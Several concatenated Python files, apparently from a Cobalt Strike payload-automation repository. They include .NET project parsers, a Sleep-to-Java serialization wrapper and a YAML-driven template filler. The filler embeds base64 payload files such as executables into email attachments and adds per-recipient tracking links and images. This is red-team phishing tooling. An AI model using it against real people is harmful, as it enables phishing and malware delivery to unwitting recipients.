def getOutputName(identifier: str):
	"""Get the output name of the exe/dll.

	Args:
		identifier (str): The directory or sln file or csproj file to parse the output names from.

	Returns:
		Any: The output names.
	"""
	return _dynamicallyDetermine(identifier, 'getOutputName')


def getOutputType(identifier: str):
	"""Get the output type (Exe, WinExe or Library)

	Args:
		identifier (str): The directory or sln file or csproj file to parse the output names from.

	Returns:
		Any: The output types.
	"""
	return _dynamicallyDetermine(identifier, 'getOutputType')


def getDebugType(identifier: str):
	"""Gets the debug information for the project based off of the configurations.

	Args:
		identifier (str): The directory or sln file or csproj file to parse the output names from.

	Returns:
		Any: The debug information.
	"""
	return _dynamicallyDetermine(identifier, 'getDebugType')


def getConfigurations(identifier: str):
	"""Gets the configuration information for the project.

	Args:
		identifier (str): The directory or sln file or csproj file to parse the output names from.

	Returns:
		Any: The configurations.
	"""
	return _dynamicallyDetermine(identifier, 'getConfigurations')

########## Directory Functions ##########

def getOutputNameDirectory(directory: str) -> list:
	"""Gets the output name for a directory.

	Args:
		directory (str): The path to the directory containing at least one .sln file.

	Returns:
		list: The list of output names for this directory.
	"""
	return _dynamicDirectory(directory, 'getOutputName')


def getOutputTypeDirectory(directory: str) -> list:
	"""Gets the output type for a directory.

	Args:
		directory (str): The path to the directory containing at least one .sln file.

	Returns:
		list: The list of output types for this directory.
	"""
	return _dynamicDirectory(directory, 'getOutputType')


def getDebugTypeDirectory(directory: str) -> dict:
	"""Gets the debug information for a directory.

	Args:
		directory (str): The path to the directory containing at least one .sln file.

	Returns:
		dict: A dict containing the config information and the debug type for those configs.
	"""
	results = dict()
	sln_files = parseDirectory(directory)
	for sln_file in sln_files:
		results[sln_file] = getDebugTypeSln(sln_file)

	return results


def getConfigurationsDirectory(directory: str) -> dict:
	"""Gets the configurations for a directory.

	Args:
		directory (str): The path to the directory containing at least one .sln file.

	Returns:
		dict: A dict containing the config and platform information.
	"""
	results = dict()
	sln_files = parseDirectory(directory)
	for sln_file in sln_files:
		results[sln_file] = getConfigurationsSln(sln_file)

	return results

########## Solution Functions ##########

def getOutputNameSln(solution_file: str) -> list:
	"""Gets the output name of projects in this solution.

	Args:
		solution_file (str): The path to the sln file.

	Returns:
		list: A list of the output names for all projects in this solution file.
	"""
	return _dynamicSln(solution_file, 'getOutputName')


def getOutputTypeSln(sln_file: str) -> list:
	"""Gets the output type of projects in this solution.

	Args:
		sln_file (str): The path to the sln file.

	Returns:
		list: A list of the output types for all projects in this solution file.
	"""
	return _dynamicSln(sln_file, 'getOutputType')


def getDebugTypeSln(sln_file: str) -> dict:
	"""Gets the debug type for the projects.

	Args:
		sln_file (str): The path to the sln file.

	Returns:
		dict: A dict containing config and platform and debug type information.
	"""
	debug_types = dict()
	csproj_files = parseSln(sln_file)
	for csproj_file in csproj_files:
		debug_types[csproj_file] = getDebugTypeCsProj(csproj_file)

	return debug_types


def getConfigurationsSln(sln_file: str) -> dict:
	"""Gets configuration information for all projects in a solution.

	Args:
		sln_file (str): The path to the sln file.

	Returns:
		dict: A dict containing config and platform information.
	"""
	configurations = dict()
	csproj_files = parseSln(sln_file)
	for csproj_file in csproj_files:
		configurations[csproj_file] = getConfigurationsCsProj(csproj_file)

	return configurations

##### Main ########

def parseArguments():
	parser = ArgumentParser()

	parser.add_argument("-l", "--language", default="c#", 
		help="the language to compile. Currently supported: [C#,]")
	parser.add_argument("file", help="the solution, project, or source-code file to compile")

	args = parser.parse_args()
	return args


def main():
	pass


# This code is important so that the dynamic functions can find the defined functions (their locals would only return 
# functions declared within the function rather than the whole file)
file_locals = locals()

if __name__ == '__main__':
	# There are some imports which aren't used when this is a library, so they are imported here instead
	from argparse import ArgumentParser
	main()



#!/usr/local/bin/python3
import secrets
import base64
import re
import sys
from importlib import import_module


# This is a local config.py file with your configuration settings
# Eventually I should move this to YAML or something... Would take a bit of a re-write based on the reflection I did
#from config import *

# Here is where I do it as a YAML file!
import yaml

class TemplateHandler:

	def __init__(self, userid="", sessiontokenname=""):
		# We create a unique userid instantiation of this object. If you want to loop to do multiple payloads (multiple targets), put the instantiation of this object in the user loop
		if userid == "":
			self.userid = secrets.token_urlsafe(10)
		else:
			self.userid = userid

		if sessiontokenname == "":
			self.sessiontokenname = "PHPSESSIONID"
		else:
			self.sessiontokenname = sessiontokenname

	def files(self, files, templatestring):

		try:
			# format should be files.exe.payload
			notusingthis, fileformat, fileskey = templatestring.split(".")
		except:
			print("Malformed files template string used: {}".format(templatestring))
		filecontents = ""

		# plaintext is a keyword that let's us know to read in the contents of the file as a string and just embed that string
		# This is useful for embedding HTML attachments into email templates
		if fileformat == "plaintext":
			try:
				with open(files.get(fileskey), "r") as file:

					filecontents = file.read()
			except:
				print("Error reading plaintext from file: {}".format(files.get(fileskey)))
				pass
		else:

			try:
				with open(files.get(fileskey), "rb") as file:

					filedata = file.read()

					filecontents = base64.b64encode(filedata).decode()
			except:
				print("Error reading from file: {}".format(files.get(fileskey)))
				pass

		return filecontents

	def links(self, links, templatestring):
		# This takes the protocol and url (from the links dict) and combines them with the linkdomain to create a complete URL for an href value
		# Note: This function uses a global called linkdomain set in the globals section of the YAML

		try:
			# format should be links.https.more-info
			notusingthis, linkprotocol, linkskey = templatestring.split(".")
		except:
			print("Malformed links template string used: {}".format(templatestring))

		linkstring = ""

		if linkprotocol == "http" or linkprotocol == "https":
			# Remember: linkdomain is a global set in the globals section of the YAML
			linkstring = linkprotocol + "://" + globalVars["linkdomain"] + links.get(linkskey) + self.sessiontokenname + "=" + self.userid
		else:
			print("Improper protocol provided. Only http or https accepted. Protocol provided: {}".format(linkprotocol))

		return linkstring


	def embededimages(self, images, templatestring):
		try:
			# format should be images.gif.logo
			notusingthis, imageformat, prependuri, imageskey = templatestring.split(".")

			dataurl = "data:image/{};base64,".format(imageformat)
		except:
			print("Malformed images template string used: {}".format(templatestring))
		filecontents = ""

		try:
			with open(images.get(imageskey), "rb") as file:
				filedata = file.read()
				filecontents = base64.b64encode(filedata).decode()

			if prependuri == "true":
				filecontents = dataurl + filecontents

		except:
			print("Error reading from image file: {}".format(images.get(imageskey)))
			print("Template string we received was: {}".format(templatestring))
			print("Images dict we have on file: {}".format(images))
			sys.exit()
			pass

		return filecontents

	def linkedimages(self, images, templatestring):
		# This takes the protocol and url (from the links dict) and combines them with the linkdomain to create a complete URL for an href value
		# Note: This function uses a global called linkdomain set in the globals section of the YAML

		try:
			# format should be links.https.more-info
			notusingthis, linkprotocol, linkskey = templatestring.split(".")
		except:
			print("Malformed links template string used: {}".format(templatestring))

		linkstring = ""

		if linkprotocol == "http" or linkprotocol == "https":
			# Remember: linkdomain is a global set in the globals section of the YAML

			linkstring = linkprotocol + "://" + globalVars["linkdomain"] + images.get(linkskey) + self.sessiontokenname + "=" + self.userid
		else:
			print("Improper protocol provided. Only http or https accepted. Protocol provided: {}".format(linkprotocol))

		return linkstring

	def trackingimages(self, images, templatestring):
		# This takes the protocol and url (from the links dict) and combines them with the linkdomain to create a complete URL for an href value
		# Note: This function uses a global called trackingdomain set in the globals section of the YAML

		try:
			# format should be links.https.more-info
			notusingthis, linkprotocol, linkskey = templatestring.split(".")
		except:
			print("Malformed links template string used: {}".format(templatestring))

		linkstring = ""

		if linkprotocol == "http" or linkprotocol == "https":
			# Remember: linkdomain is a global set in the globals section of the YAML

			linkstring = linkprotocol + "://" + globalVars["trackingdomain"] + images.get(linkskey) + self.sessiontokenname + "=" + self.userid
		else:
			print("Improper protocol provided. Only http or https accepted. Protocol provided: {}".format(linkprotocol))

		return linkstring

	def emails(self, emails, templatestring):
		# This is a simple string replacement for the email from the emails dict
		try:
			# format should be email.replay-to
			notusingthis, emailskey = templatestring.split(".")
		except:
			print("Malformed emails template string used: {}".format(templatestring))

		return emails.get(emailskey)

	def strings(self, strings, templatestring):
		# This is a simple string replacement for the string from the strings dict
		try:
			# format should be strings.file-name
			notusingthis, stringskey = templatestring.split(".")
		except:
			print("Malformed strings template string used: {}".format(templatestring))

		return strings.get(stringskey)


class MissingTemplateValue(Exception):
	"""Exception raised for errors in the input for template values.

	Attributes:
		missingvalue -- input which was missing and caused the error
		message -- explanation of the error
	"""

	def __init__(self, missingvalue):
		self.missingvalue = missingvalue
		self.message = "Template value missing: {}".format(missingvalue)

		super().__init__(self.message)

def usage():
	print("Usage:	python3 {} [config] [template] [output]".format(sys.argv[0]))



def main(config, template, output):


	# Taken from commandline args
	configFile = config
	attachmenttemplate = template
	attachmentoutputfile = output

	# Was considering doing this all together, but I think the arguments is a better approach
	emailtemplate = "SecureEmailTemplateExample.tmpl"



	# Read in the values into a settings dictionary
	with open(configFile) as file:
		settings = yaml.full_load(file)

	# Load in the globals
	global globalVars
	globalVars = settings["globals"]

	# Read in the template file where we will replace some strings
	with open(attachmenttemplate, "r") as file:
		template = file.read()

	# We are going to look for anything that starts with {% and ends with %}. Example: {%images.gif.lock%}
	attachmentregex = r"{%(.*?)%}"
	pattern = re.compile(attachmentregex)
	matches = pattern.findall(template)

	# our TemplateHandler is what does all the work
	handler = TemplateHandler()
	for match in matches:
		try:
			matchtype = match.split('.')[0]
			#print(matchtype)
		except:
			print("Match found without type: {}".format(match))
			pass

		# Checks the global variables for a variable with that name (i.e. files.exe.payload template value and files = {} variable)
		#if matchtype in globals():
		if matchtype in settings.keys():


			# Use reflection to call the right method in the TemplateHandler class. 
			# This allows us to do different actions/manipulations 
			replacement = getattr(handler, matchtype)(settings.get(matchtype), match)

			if replacement:
				template = template.replace(("{%" + match + "%}"), replacement)
			else:
				print("It looks like we are missing the replacement value for {} in your YAML file.".format(match))
				sys.exit("Go fix your shit and come back when it's right! (╯°□°)╯︵ ┻━┻")
		else:
			print("Matchtype not found: {}".format(matchtype))
			sys.exit("Go fix your shit and come back when it's right! (╯°□°)╯︵ ┻━┻")


	with open(attachmentoutputfile, "w") as file:
		file.write(template)
	print("Wrote output to: {}".format(attachmentoutputfile))

if __name__ == '__main__':

	if (len(sys.argv) != 4):
		print("Error: Incorrect number of arguments provided.\n")
		usage()
	else:
		main(sys.argv[1], sys.argv[2], sys.argv[3])



import setuptools

with open("README.md", "r") as fh:
    long_description = fh.read()

setuptools.setup(
    name="payload_automation",
    version="1.0.4",
    author="Faultline",
    author_email="jahawkins623@gmail.com",
    description="A set of libraries to help be a bridge between Sleep and Python, helping to automate payload development, testing, opsec checking, and deployment for Cobalt Strike",
    long_description=long_description,
    long_description_content_type="text/markdown",
    url="https://github.com/emcghee/PayloadAutomation",
    packages=setuptools.find_packages(),
    classifiers=[
        "Programming Language :: Python :: 3",
        "License :: OSI Approved :: GNU General Public License v3 (GPLv3)",
        "Operating System :: OS Independent",
    ],
    python_requires='>=3.6',
    install_requires=[
        'javaobj-py3>=0.4.1',
        'pepy>=1.2.0',
        'ptyprocess>=0.5',
        'pexpect',
        'magicfile',
	'PyYAML==5.4.1'
    ],
    download_url = 'https://github.com/emcghee/PayloadAutomation/archive/refs/tags/1.0.1.tar.gz',
)



from base64 import b64decode
from javaobj import loads


def wrap_command(command: str) -> str:
    """Wraps a sleep command in a Java serialization wrapper to conver the output to a serialized Java object.

    Args:
        command (str): The command to wrap in the wrapper.

    Returns:
        str: The wrapped sleep command.
    """    

    wrapper = """
    sub callback {
        {{COMMAND}};
    }

    import java.io.*; 
    import java.util.*; 
    $baos = [new ByteArrayOutputStream]; 
    $oos = [new ObjectOutputStream: $baos]; 
    [$oos writeObject: callback()]; 
    [$oos close]; 
    $encoder = [Base64 getEncoder]; 
    println([$encoder encodeToString: [$baos toByteArray]]);
    """

    # Replace command in wrapper
    wrapper = wrapper.replace(r"{{COMMAND}}", command)
    return convert_to_oneline(wrapper)


def convert_to_oneline(multiline: str) -> str:
    """Converts a multiline Sleep command to a single line.

    Args:
        multiline (str): The multiline Sleep command.

    Returns:
        str: A single-lined version of the same Sleep command.
    """
    afterComments = removeComments(multiline)
    
    # Format wrapper so it sends as one-line
    oneline = afterComments.replace('\n', '')
    # Replace 4 spaces with nothing (if tabbed but using spaces as tabs)
    nospaces = oneline.replace('    ', '')
    # Replace tabs with nothing
    notabs = nospaces.replace('\t', '')

    return notabs

def removeComments(original: str) -> str:
    lines = original.split('\n')
    inString = False
    stringChar = None

    parsed = str()

    for line in lines:
        parsedLine = str()
        for char in line:
            if not inString:
                # Not in string and we found comment, so rest of the line is a comment
                if char == "#":
                    break
                # Not in string and we found single quote
                elif char == "'" or char == '"':
                    inString = True
                    stringChar = char

            else:
                if char == stringChar:
                    inString = False
                    stringChar = None

            parsedLine += char
        if parsedLine:
            parsed += parsedLine + '\n'
        

    print(f"Parsed: {parsed.strip()}")
    return parsed.strip()


def deserialize(serialized: str):
    """Deserializes a base64 Java serialized object.

    Args:
        serialized (str): The base64 Java serialized object to deserialize.

    Raises:
        Exception: An exception if one os thrown during deserializing. 
        Contains what exception was thrown and a preview of the data that threw the exception.

    Returns:
        Any: The python object of the Java serialized object.
    """    
    try:
        decoded = b64decode(serialized)
        return loads(decoded)
    except Exception as e:
        # If we raise an Exception in a try/except, it includes the original exception.
        # So we include from None to prevent this (and only raise a single exception)
        raise Exception(f"{type(e).__name__}: {e} raised on {serialized[:50]}") from None


def main():
    string = """
    Multiline String Goes 
    Here
    
    # Comment Whole Line
    Comment Partial # Line
    
    Comment in String
    string = "#" 
    string = '#'
    
    string = "'#'"
    string = "'#'"
    
    Comments and in String
    string = "#" #Test
    string = '#' #test
    """
    print(removeComments(string))


if __name__ == "__main__":
    main()
